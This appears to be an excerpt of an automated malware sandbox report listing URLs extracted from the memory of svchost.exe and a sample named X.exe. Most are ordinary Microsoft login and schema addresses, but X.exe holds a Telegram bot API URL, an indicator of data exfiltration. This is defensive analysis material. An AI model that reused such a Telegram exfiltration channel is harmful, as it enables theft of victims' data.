                  Source: svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAAA
                  Source: svchost.exe, 00000012.00000003.4039112538.00000152D0955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdGntIGGem
                  Source: svchost.exe, 00000012.00000003.4031962381.00000152D095D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031443608.00000152D0956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecuri
                  Source: svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlns:p
                  Source: svchost.exe, 00000012.00000003.4031443608.00000152D0954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds.xm
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsa=
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoa
                  Source: svchost.exe, 00000012.00000003.4031942080.00000152D0953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtp:
                  Source: svchost.exe, 00000012.00000003.4046777825.00000152D0953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046596064.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxml
                  Source: svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521120511.00000152D0081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000012.00000002.4521505766.00000152D090F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046392383.00000152D0907000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046671128.00000152D090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                  Source: svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80601
                  Source: svchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scerence
                  Source: svchost.exe, 00000012.00000002.4521525759.00000152D0913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4031991419.00000152D0E52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521577838.00000152D095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4056518662.00000152D0966000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521550829.00000152D0937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000012.00000003.4032063230.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4032063230.00000152D095A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue.srf
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: X.exe, 00000000.00000002.4055350482.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Amcache.hve.17.drString found in binary or memory: http://upx.sf.net
                  Source: svchost.exe, 00000012.00000002.4521937878.00000152D0E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                  Source: svchost.exe, 00000012.00000003.4031910850.00000152D0E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.g/2000/09/xmldsig#&quot;&gt;&l
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013744014.00000152D0957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: X.exe, Svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.ecur
                  Source: svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfR
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfrf
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601er
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfR
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfy.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfrf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521314909.00000152D00E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521911037.00000152D0E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013536862.00000152D0910000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfssuer
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000012.00000003.4013867750.00000152D0927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521622170.00000152D096F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046796242.00000152D096E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4046462354.00000152D096D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013825821.00000152D096B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000012.00000003.4013433507.00000152D092C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521071939.00000152D0045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4014124615.00000152D0956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013433507.00000152D0929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806031
                  Source: svchost.exe, 00000012.00000003.4013575095.00000152D0952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013784919.00000152D0963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000012.00000003.4013719867.00000152D093B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4013763445.00000152D0940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
